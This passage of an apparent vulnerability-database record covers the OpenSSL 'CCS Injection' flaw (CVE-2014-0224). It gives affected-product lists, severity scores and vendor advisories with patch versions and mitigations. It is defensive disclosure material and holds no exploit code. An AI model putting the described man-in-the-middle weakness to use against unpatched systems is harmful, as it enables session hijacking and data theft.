"0.9.8za", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_web_platform:5.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:storage:2.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_web_server:2.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.2.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:filezilla-project:filezilla_server:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.9.45", "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:application_processing_engine_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.0.2", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:application_processing_engine:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:cp1543-1_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.1.25", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:cp1543-1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:s7-1500_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.6", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:s7-1500:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:siemens:rox_firmware:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "1.16.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:h:siemens:rox:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false } ], "operator": "OR" } ], "cpe_match": [], "operator": "AND" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:mariadb:mariadb:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "10.0.13", "versionStartIncluding": "10.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "3.4.2", "versionStartIncluding": "3.4.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:python:python:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "2.7.8", "versionStartIncluding": "2.7.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:nodejs:node.js:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.10.29", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0224" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "127936" }, { "db": "PACKETSTORM", "id": "127422" }, { "db": "PACKETSTORM", "id": "127403" }, { "db": "PACKETSTORM", "id": "127190" }, { "db": "PACKETSTORM", "id": "128345" } ], "trust": 0.5 }, "cve": "CVE-2014-0224", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2014-0224", "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" } ], "severity": [ { "author": "NVD", "id": "CVE-2014-0224", "trust": 1.0, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201406-080", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-0224", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-0224" }, { "db": "CNNVD", "id": "CNNVD-201406-080" }, { "db": "NVD", "id": "CVE-2014-0224" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the \"CCS Injection\" vulnerability. OpenSSL is prone to security-bypass vulnerability. \nSuccessfully exploiting this issue may allow attackers to obtain sensitive information by conducting a man-in-the-middle attack. This may lead to other attacks. \nVersions prior to OpenSSL 1.0.1 and 1.0.2-beta1 are vulnerable. \n\nHP Connect IT / HP SPM CIT - 9.5x\n Please install: HP Connect IT 9.53.P2\n\nFor Windows\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00070\n\nFor Linux\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00071\n\nFor AIX\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00072\n\nFor HPUX\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00073\n\nFor Solaris\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00074\n\nHP Connect IT / HP SPM CIT - 9.4x\n Please install: HP Connect IT 9.40.P1\n\nFor windows(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00075\n\nFor Linux(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00076\n\nFor AIX(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00077\n\nFor HPUX(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00078\n\nFor Solaris(en)\n http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00079\n\nHP Connect IT / HP SPM AM 5.2x\n Please install: HP Connect IT 9.41.P1\n\nHISTORY\nVersion:1 (rev.1) - 19 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. ============================================================================\nUbuntu Security Notice USN-2232-3\nJune 23, 2014\n\nopenssl regression\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n- Ubuntu 13.10\n- Ubuntu 12.04 LTS\n- Ubuntu 10.04 LTS\n\nSummary:\n\nUSN-2232-1 introduced a regression in OpenSSL. The upstream fix for\nCVE-2014-0224 caused a regression for certain applications that use\nrenegotiation, such as PostgreSQL. This update fixes the problem. \n\nOriginal advisory details:\n\n J=C3=BCri Aedla discovered that OpenSSL incorrectly handled invalid DTLS\n fragments. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and\n Ubuntu 14.04 LTS. (CVE-2014-0195)\n Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. A\n remote attacker could use this issue to cause OpenSSL to crash, resulting\n in a denial of service. (CVE-2014-0221)\n KIKUCHI Masashi discovered that OpenSSL incorrectly handled certain\n handshakes. \n (CVE-2014-0224)\n Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled\n anonymous ECDH ciphersuites. A remote attacker could use this issue to\n cause OpenSSL to crash, resulting in a denial of service. This issue only\n affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. \n (CVE-2014-3470)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.4\n\nUbuntu 13.10:\n libssl1.0.0 1.0.1e-3ubuntu1.6\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.16\n\nUbuntu 10.04 LTS:\n libssl0.9.8 0.9.8k-7ubuntu8.19\n\nAfter a standard system update you need to reboot your computer to make all\nthe necessary changes. \n\nReferences:\n http://www.ubuntu.com/usn/usn-2232-3\n http://www.ubuntu.com/usn/usn-2232-1\n https://launchpad.net/bugs/1332643\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.4\n https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.6\n https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.16\n https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.19\n. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201407-05\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: OpenSSL: Multiple vulnerabilities\n Date: July 27, 2014\n Bugs: #512506\n ID: 201407-05\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in OpenSSL, possibly allowing\nremote attackers to execute arbitrary code. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 dev-libs/openssl \u003c 1.0.1h-r1 *\u003e= 0.9.8z_p5\n *\u003e= 0.9.8z_p4\n *\u003e= 0.9.8z_p1\n *\u003e= 0.9.8z_p3\n *\u003e= 0.9.8z_p2\n *\u003e= 1.0.0m\n \u003e= 1.0.1h-r1\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in OpenSSL. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1h-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2010-5298\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298\n[ 2 ] CVE-2014-0195\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195\n[ 3 ] CVE-2014-0198\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198\n[ 4 ] CVE-2014-0221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221\n[ 5 ] CVE-2014-0224\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224\n[ 6 ] CVE-2014-3470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470\n[ 7 ] OpenSSL Security Advisory [05 Jun 2014]\n http://www.openssl.org/news/secadv_20140605.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201407-05.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. The bulletin does not apply to any other 3rd party application\n(e.g. operating system, web server, or application server) that may be\nrequired to be installed by the customer according instructions in the\nproduct install guide. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04347622\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04347622\nVersion: 1\n\nHPSBHF03052 rev.1 - HP Intelligent Management Center (iMC), HP Network\nProducts including H3C and 3COM Routers and Switches running OpenSSL, Remote\nDenial of Service (DoS), Code Execution, Unauthorized Access, Modification or\nDisclosure of Information\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-06-20\nLast Updated: 2014-06-20\n\nPotential Security Impact: Remote Denial of Service (DoS), code execution,\nunauthorized access, modification of information, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Intelligent\nManagement Center (iMC), HP Network Products including 3COM and H3C routers\nand switches running OpenSSL. The vulnerabilities could be exploited remotely\nto create a Denial of Service (DoS), execute code, allow unauthorized access,\nmodify or disclose information. \n\nReferences:\n\nCVE-2010-5298 Remote Denial of Service (DoS) or Modification of Information\nCVE-2014-0198 Remote Unauthorized Access (only iMC impacted)\nCVE-2014-0224 Remote Unauthorized Access or Disclosure of Information\nSSRT101561\nNote: All products listed are impacted by CVE-2014-0224 . iMC is also\nimpacted by CVE-2014-0198 and CVE-2010-5298\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nPlease refer to the RESOLUTION\n section below for a list of impacted products. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0\nCVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\nOn June 5th 2014, OpenSSL.org issued an advisory with several CVE\nvulnerabilities. HP Networking is working to release fixes for these\nvulnerabilities that impact the products in the table below. As fixed\nsoftware is made available, this security bulletin will be updated to show\nthe fixed versions. Until the software fixes are available, HP Networking is\nproviding the following information including possible workarounds to\nmitigate the risks of these vulnerabilities. \n\nDescription\n\nThe most serious issue reported is CVE-2014-0224 and it is the one discussed\nhere. To take advantage CVE-2014-0224, an attacker must:\n\nbe in between the OpenSSL client and OpenSSL server. \nbe capable of intercepting and modifying packets between the OpenSSL client\nand OpenSSL server in real time. \n\nWorkarounds\n\nHP Networking equipment is typically deployed inside firewalls and access to\nmanagement interfaces and other protocols is more tightly controlled than in\npublic environments. This deployment and security restrictions help to reduce\nthe possibility of an attacker being able to intercept both OpenSSL client\nand OpenSSL server traffic. \n\nFollowing the guidelines in the Hardening Comware-based devices can help to\nfurther reduce man-in-the-middle opportunities:\n\nhttp://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=c03536\n920\n\nFor an HP Networking device acting as an OpenSSL Server, using a patched\nOpenSSL client or non-OpenSSL client eliminates the risk. As an example, most\nmodern web browsers do not use the OpenSSL client and the sessions between\nthe HP Networking OpenSSL server and the non-OpenSSL client are not at risk\nfor this attack. For HP Networking Equipment that is using an OpenSSL client,\npatching the OpenSSL server will eliminate the risk of this attack. \n\nProtocol Notes\n\nThe following details the protocols that use OpenSSL in Comware v5 and\nComware v7:\n\nComware V7:\n\nServer:\n\nFIPS/HTTPS/Load Balancing/Session Initiation Protocol\n\nClient:\n\nLoad Balancing/OpenFlow/Session Initiation Protocol/State Machine Based\nAnti-Spoofing/Dynamic DNS\n\nComware V5:\n\nServer:\n\nCAPWAP/EAP/SSLVPN\n\nClient:\n\nDynamic DNS\n\nFamily\n Fixed Version\n HP Branded Products Impacted\n H3C Branded Products Impacted\n 3Com Branded Products Impacted\n\n12900 Switch Series\n Fix in progress\nuse mitigations\n JG619A HP FF 12910 Switch AC Chassis\nJG621A HP FF 12910 Main Processing Unit\nJG632A HP FF 12916 Switch AC Chassis\nJG634A HP FF 12916 Main Processing Unit\n\n12500\n Fix in progress\nuse mitigations\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJC808A HP 12500 TAA Main Processing Unit\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\n\n12500 (Comware v7)\n Fix in progress\nuse mitigations\n JC085A HP A12518 Switch Chassis\nJC086A HP A12508 Switch Chassis\nJC652A HP 12508 DC Switch Chassis\nJC653A HP 12518 DC Switch Chassis\nJC654A HP 12504 AC Switch Chassis\nJC655A HP 12504 DC Switch Chassis\nJF430A HP A12518 Switch Chassis\nJF430B HP 12518 Switch Chassis\nJF430C HP 12518 AC Switch Chassis\nJF431A HP A12508 Switch Chassis\nJF431B HP 12508 Switch Chassis\nJF431C HP 12508 AC Switch Chassis\nJC072B HP 12500 Main Processing Unit\nJG497A HP 12500 MPU w/Comware V7 OS\nJG782A HP FF 12508E AC Switch Chassis\nJG783A HP FF 12508E DC Switch Chassis\nJG784A HP FF 12518E AC Switch Chassis\nJG785A HP FF 12518E DC Switch Chassis\nJG802A HP FF 12500E MPU\n H3C S12508 Routing Switch(AC-1) (0235A0GE)\nH3C S12518 Routing Switch(AC-1) (0235A0GF)\nH3C S12508 Chassis (0235A0E6)\nH3C S12508 Chassis (0235A38N)\nH3C S12518 Chassis (0235A0E7)\nH3C S12518 Chassis (0235A38M)\n\n11900 Switch Series\n Fix in progress\nuse mitigations\n JG608A HP FF 11908-V Switch Chassis\nJG609A HP FF 11900 Main Processing Unit\n\n10500 Switch Series (Comware v5)\n Fix in progress\nuse mitigations\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC614A HP 10500 Main Processing Unit\nJC748A HP 10512 Switch Chassis\nJG375A HP 10500 TAA Main Processing Unit\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\n\n10500 Switch Series (Comware v7)\n Fix in progress\nuse mitigations\n JC611A HP 10508-V Switch Chassis\nJC612A HP 10508 Switch Chassis\nJC613A HP 10504 Switch Chassis\nJC748A HP 10512 Switch Chassis\nJG820A HP 10504 TAA Switch Chassis\nJG821A HP 10508 TAA Switch Chassis\nJG822A HP 10508-V TAA Switch Chassis\nJG823A HP 10512 TAA Switch Chassis\nJG496A HP 10500 Type A MPU w/Comware v7 OS\n\n9500E\n Fix in progress\nuse mitigations\n JC124A HP A9508 Switch Chassis\nJC124B HP 9505 Switch Chassis\nJC125A HP A9512 Switch Chassis\nJC125B HP 9512 Switch Chassis\nJC474A HP A9508-V Switch Chassis\nJC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9512E Routing-Switch Chassis (0235A0G7)\nH3C S9508E-V Routing-Switch Chassis (0235A38Q)\nH3C S9505E Chassis w/ Fans (0235A38P)\nH3C S9512E Chassis w/ Fans (0235A38R)\n\nRouter 8800\n Fix in progress\nuse mitigations\n JC147A HP A8802 Router Chassis\nJC147B HP 8802 Router Chassis\nJC148A HP A8805 Router Chassis\nJC148B HP 8805 Router Chassis\nJC149A HP A8808 Router Chassis\nJC149B HP 8808 Router Chassis\nJC150A HP A8812 Router Chassis\nJC150B HP 8812 Router Chassis\nJC141A HP 8802 Main Control Unit Module\nJC138A HP 8805/08/12 (1E) Main Cntrl Unit Mod\nJC137A HP 8805/08/12 (2E) Main Cntrl Unit Mod\n H3C SR8805 10G Core Router Chassis (0235A0G8)\nH3C SR8808 10G Core Router Chassis (0235A0G9)\nH3C SR8812 10G Core Router Chassis (0235A0GA)\nH3C SR8802 10G Core Router Chassis (0235A0GC)\nH3C SR8802 10G Core Router Chassis (0235A31B)\nH3C SR8805 10G Core Router Chassis (0235A31C)\nH3C SR8808 10G Core Router Chassis (0235A31D)\nH3C SR8812 10G Core Router Chassis (0235A31E)\n\n7500 Switch Series\n Fix in progress\nuse mitigations\n JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T\nJC697A HP A7502 TAA Main Processing Unit\nJC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE\nJC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE\nJC700A HP A7500 384 Gbps TAA Fabric / MPU\nJC701A HP A7510 768 Gbps TAA Fabric / MPU\nJD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports\nJD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports\nJD194A HP 384 Gbps Fabric A7500 Module\nJD194B HP 7500 384Gbps Fabric Module\nJD195A HP 7500 384Gbps Advanced Fabric Module\nJD196A HP 7502 Fabric Module\nJD220A HP 7500 768Gbps Fabric Module\nJD238A HP A7510 Switch Chassis\nJD238B HP 7510 Switch Chassis\nJD239A HP A7506 Switch Chassis\nJD239B HP 7506 Switch Chassis\nJD240A HP A7503 Switch Chassis\nJD240B HP 7503 Switch Chassis\nJD241A HP A7506 Vertical Switch Chassis\nJD241B HP 7506-V Switch Chassis\nJD242A HP A7502 Switch Chassis\nJD242B HP 7502 Switch Chassis\nJD243A HP A7503 Switch Chassis w/1 Fabric Slot\nJD243B HP 7503-S Switch Chassis w/1 Fabric Slot\n H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4)\nH3C S7503E Ethernet Switch Chassis with Fan (0235A0G2)\nH3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5)\nH3C S7506E Ethernet Switch Chassis with Fan (0235A0G1)\nH3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3)\nH3C S7510E Ethernet Switch Chassis with Fan (0235A0G0)\nH3C S7502E Chassis w/ fans (0235A29A)\nH3C S7503E Chassis w/ fans (0235A27R)\nH3C S7503E-S Chassis w/ fans (0235A33R)\nH3C S7506E Chassis w/ fans (0235A27Q)\nH3C S7506E-V Chassis w/ fans (0235A27S)\n\nHSR6800\n Fix in progress\nuse mitigations\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\nHSR6800 Russian Version\n Fix in progress\nuse mitigations\n JG361A HP HSR6802 Router Chassis\nJG362A HP HSR6804 Router Chassis\nJG363A HP HSR6808 Router Chassis\nJG364A HP HSR6800 RSE-X2 Router MPU\nJG779A HP HSR6800 RSE-X2 Router TAA MPU\n\nHSR6602\n Fix in progress\nuse mitigations\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\nHSR6602 Russian Version\n Fix in progress\nuse mitigations\n JG353A HP HSR6602-G Router\nJG354A HP HSR6602-XG Router\nJG776A HP HSR6602-G TAA Router\nJG777A HP HSR6602-XG TAA Router\n\nA6600\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\nA6600 Russian Version\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJC566A HP A6600 RSE-X1 Main Processing Unit\nJG780A HP 6600 RSE-X1 Router TAA MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n6600 MCP\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n6600 MCP Russian Version\n Fix in progress\nuse mitigations\n JC177A HP 6608 Router\nJC177B HP A6608 Router Chassis\nJC178A HP 6604 Router Chassis\nJC178B HP A6604 Router Chassis\nJC496A HP 6616 Router Chassis\nJG778A HP 6600 MCP-X2 Router TAA MPU\nJG355A HP 6600 MCP-X1 Router MPU\nJG356A HP 6600 MCP-X2 Router MPU\n H3C RT-SR6608-OVS-H3 (0235A32X)\nH3C RT-SR6604-OVS-H3 (0235A37X)\nH3C SR6616 Router Chassis (0235A41D)\n\n5920 Switch Series\n Fix in progress\nuse mitigations\n JG296A HP 5920AF-24XG Switch\nJG555A HP 5920AF-24XG TAA Switch\n\n5900 Switch Series\n Fix in progress\nuse mitigations\n JC772A HP 5900AF-48XG-4QSFP+ Switch\nJG336A HP 5900AF-48XGT-4QSFP+ Switch\nJG510A HP 5900AF-48G-4XG-2QSFP+ Switch\nJG554A HP 5900AF-48XG-4QSFP+ TAA Switch\nJG838A HP FF 5900CP-48XG-4QSFP+ Switch\n\n5900 Virtual Switch\n Fix in progress\nuse mitigations\n JG814AAE HP Virtual Switch 5900v VMware E-LTU\nJG815AAE HP VSO SW for 